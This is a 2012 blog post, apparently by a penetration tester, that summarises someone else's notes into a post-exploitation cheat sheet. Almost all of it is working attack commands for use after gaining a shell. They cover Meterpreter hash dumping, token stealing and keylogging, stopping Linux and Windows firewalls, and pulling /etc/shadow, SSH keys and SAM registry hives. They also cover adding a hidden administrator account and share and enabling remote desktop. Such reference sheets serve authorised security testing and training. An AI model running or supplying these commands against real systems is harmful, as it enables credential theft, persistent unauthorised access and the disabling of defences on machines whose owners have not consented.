«
»

Post Exploit Commands

Published February 7, 2012 | By phillips321

Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I’m simply blogging about it to make a summary of this for myself.

Meterpreter Post Auth

Information Gathering

1
2
3
4
5
6
7
8
9
10
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

Escalating Privs

1
2
ps then migrate
getsystem

Tokens (use incognito)

1
2
3
4
list_tokens -u
impersonate_token
steal_token [pid]
rev2self

Retrieve Passwords

1
2
3
4
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc

Session

1
2
3
4
enumdesktops
getdesktop
setdesktop
uictl disable keyboard

Keylog

1
2
3
keyscan_start
keyscan_dump
keyscan_stop

Nix Post Auth

Disable Firewall

1
2
3
4
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules

Files to pull

1
2
3
4
5
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers

User Information

1
2
3
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*

Windows Post Auth

Get current logged in user

1
@echo %USERNAME%

Add user

1
2
net user pentest password /add
net localgroup administrators pentest /add

Add share

1
net share nothing$=C:\ /grant:pentest,FULL /unlimited

Disable Firewall

1
netsh firewall set opmode disable

Auto Start Directories

1
2
3
4
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

Accounts and Policies

1
2
3
net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain

Files to pull

1
2
3
4
5
6
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive

Enable Remote Desktop

1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Should you wish to have all this useful info (as well as an ascii table) then feel free to use the following wallpaper (1920×1200).

Or customize the GIMP XCF file yourself.

Posted in Linux, metasploit, Networking | Tagged , , , , , ,

Leave a Reply

Please feel free to share my content but always link back here :-)